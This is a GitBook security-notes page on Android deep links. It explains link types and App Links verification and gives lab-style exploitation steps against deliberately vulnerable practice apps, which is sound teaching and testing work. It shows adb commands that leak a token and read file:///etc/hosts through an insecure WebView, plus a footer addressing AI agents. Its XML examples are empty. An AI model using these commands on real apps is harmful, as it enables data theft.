> For the complete documentation index, see [llms.txt](https://sec88.0x88.online/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sec88.0x88.online/android-appsec/deep-links-hacking.md). # Deep Links Hacking ### Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Types of Deep Links

### 1. Deep Links

**Definition:** Handles URIs in the form of `scheme://authority/path`. * **Scheme:** Can be standard (e.g., `http`, `https`) or custom (e.g., `app://`). * **Authority:** Should have a domain structure to clarify ownership. * **Path:** Directs the user to a particular activity based on app logic. **Example:** ```xml

``` Here, the “DeepLinkActivity” will be able to open links of type `vaadata://test/hello`, `vaadata://test/hello?test=1` or `vaadata://test/hello?a=1&test=coucou`. Sample Link: * Instagram: `instagram://media?id=123456789` * Spotify: `spotify:track:123456789` * Facebook: `fb://page?id=123456789` ### 2. Web Links

* **Definition:** Deep links that use the `HTTP` and `HTTPS` schemes.. * **Characteristics:** Standard web URLs that redirect to specific app content. * **Implementation:** ```xml ``` ``` http://myownpersonaldomain.com/path/to/resource ``` * **Behavior:** On Android 12+, always opens in a web browser. On older versions, may display a disambiguation dialog. ### 3. Android App Links

* **Definition:** Web links that use the `HTTP` and `HTTPS` schemes and contain the `autoVerify` attribute. * **Implementation:** ```xml xmlCopy code ``` * **Benefits:** * **Secure and Specific:** Links to a website domain you own. * **Seamless User Experience:** Users without the app go to the website. * **Android Instant Apps Support:** Users can run your app without installing it. * **Engage Users from Google Search:** Opens specific content in your app from Google search results. ### Steps to Add Android App Links #### 1. Create Deep Links * **Add intent filters:** Configure your app to use data from intents to direct users to the right content. * **Example:** ```xml ``` #### 2. Add Verification for Your Deep Links * **Configure verification:** Request verification of app links and publish a Digital Asset Links JSON file on your website. (e.g ) * **Example:** ```json { "relation": ["delegate_permission/common.handle_all_urls"], "target": {"namespace": "android_app", "package_name": "com.example.app", "sha256_cert_fingerprints": ["..."]} } ``` #### 3. Use Android App Links Assistant * **Tool in Android Studio:** Guides you through the steps required to create Android App Links. *** ### Exploitation of Deep Links ### App 1: DeepLin-app **Step 1:** Decompile the app using tools like Jadx. * **Command:** ```bash jadx -d output_folder DeepLin-app.apk ``` **Step 2:** Open `AndroidManifest.xml` to identify intent filters. **Found Intent Filter:** ```xml ``` **Exploit via adb:** ```bash adb shell am start -a android.intent.action.VIEW -d "holiday://whatever.login/test?token=2100537c6456cd8a437f7734fad189a8" ``` **Exploit via PoC:** ```java Uri deepLinkURL = getIntent().getData(); System.out.println("Credentials: " + deepLinkURL.toString()); ``` **In `AndroidManifest.xml`:** ```xml ``` ### App 2: BeetleBug **Step 1:** Decompile the app using tools like Jadx. * **Command:** ```bash jadx -d output_folder BeetleBug.apk ``` **Step 2:** Open `AndroidManifest.xml` to identify intent filters. **Found Intent Filter:** ```xml ``` **Exploit via adb:** ```bash adb shell am start -a android.intent.action.VIEW -d "https://beetlebug.com/account" ``` ### App 3: InsecureShop **Step 1:** Decompile the app using tools like Jadx. * **Command:** ```bash jadx -d output_folder InsecureShop.apk ``` **Step 2:** Open `AndroidManifest.xml` to identify intent filters. **Found Intent Filter:** ```xml ``` **Exploit via adb to load arbitrary URL:** ```bash adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=http://example.com' ``` **Exploit via adb to read system files:** ```bash adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=file:///etc/hosts' ``` **Code Snippet with Vulnerabilities:** ```java WebView webView = findViewById(R.id.webview); webView.getSettings().setJavaScriptEnabled(true); webView.getSettings().setAllowUniversalAccessFromFileURLs(true); Uri uri = getIntent().getData(); if (uri != null) { String url = uri.getQueryParameter("url"); if (url != null) { webView.loadUrl(url); } } ``` **How to Mitigate?** ✅ Set `android:exported="false"` for sensitive activities.\ ✅ Enforce authentication before executing deep link actions.\ ✅ Use `android:autoVerify="true"` for web-based deep links.\ ✅ Sanitize Input in Deep Links\ ✅ Disable JavaScript & restrict URL loads in WebView. ```javascript webView.getSettings().setJavaScriptEnabled(false); webView.getSettings().setAllowFileAccess(false); ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sec88.0x88.online/android-appsec/deep-links-hacking.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.